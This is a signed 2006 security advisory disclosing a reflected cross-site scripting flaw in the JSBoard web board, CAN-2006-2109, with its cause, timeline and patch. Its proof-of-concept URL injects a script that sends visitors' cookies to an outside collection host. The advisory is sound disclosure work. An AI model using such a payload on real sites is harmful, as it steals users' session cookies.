aklink-sa-2006-001-jsboard-xss.txt

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
============================================  
||| Security Advisory AKLINK-SA-2006-001 |||  
||| CAN-2006-2109 (CVE candidate) |||  
============================================  
  
JSBoard - Cross Site Scripting Attack  
=====================================  
  
Date released: 02.05.2006  
Date reported: 30.04.2006  
$Revision: 1.1 $  
  
by Alexander Klink  
[email protected]  
https://www.klink.name/security/aklink-sa-2006-001-jsboard-xss.txt  
(TLS certificate information: https://www.klink.name/tls.txt)  
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2006-2109  
  
Vendor: JoungKyun Kim (Open Source)  
Product: JSBoard - a news and discussion web board popular in Korea  
Website: http://jsboard.kldp.org  
Vulnerability: Non-persistent XSS attack  
Class: remote  
Status: patched  
Severity: low (possible disclosure of session and other cookies)  
Releases known to be affected: 2.0.11, 2.0.10  
Releases known NOT to be affected: 2.0.12  
  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
Overview:  
  
A non-persistent XSS attack can be carried out using variables that  
are supposed to be from included files but can be overwritten using  
variables defined in the CGI query.  
  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
Technical details:  
  
In the function parse_query_str() in include/print.php every variable  
from the CGI request is set as a global variable, regardless of prior  
use. As parse_query_str() is typically called after the inclusion of  
other files that define variables which are not changed but output  
in the rest of the program, this allows an attacker to inject XSS  
code, for example Javascript.  
  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
Proof of concept:  
  
http://[target]/jsboard/login.php?table=<script>document.location='http://www.cgi-security.com/cgi-bin/cookie.cgi'%2Bdocument.cookie</script>  
  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
Workaround:  
  
None known.  
  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
Communication:  
  
* 30.04.2006: Problem reported to author  
* 30.04.2006: Author replies and releases patched version 2.0.12  
  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
Solution:  
  
Install JSBoard 2.0.12, which fixes this particular attack vector.  
Note that CGI query variables are still imported into the global  
namespace, which means a similar problem might appear in a later version.  
The patch is available from:  
http://kldp.net/frs/download.php/3346/2.0.11-2.0.12.patch.tar.gz  
  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
Credit:  
  
Alexander Klink (discovery)  
  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.2.5 (GNU/Linux)  
  
iD8DBQFEVs008Q3kKmNSxUURAoNLAJ0bnP+eZ2x4O3Nj57cMtLZKam6tqwCffCdv  
Z7Jztkr1x7zn/uOaHy+rTSs=  
=k/y4  
-----END PGP SIGNATURE-----  
  
`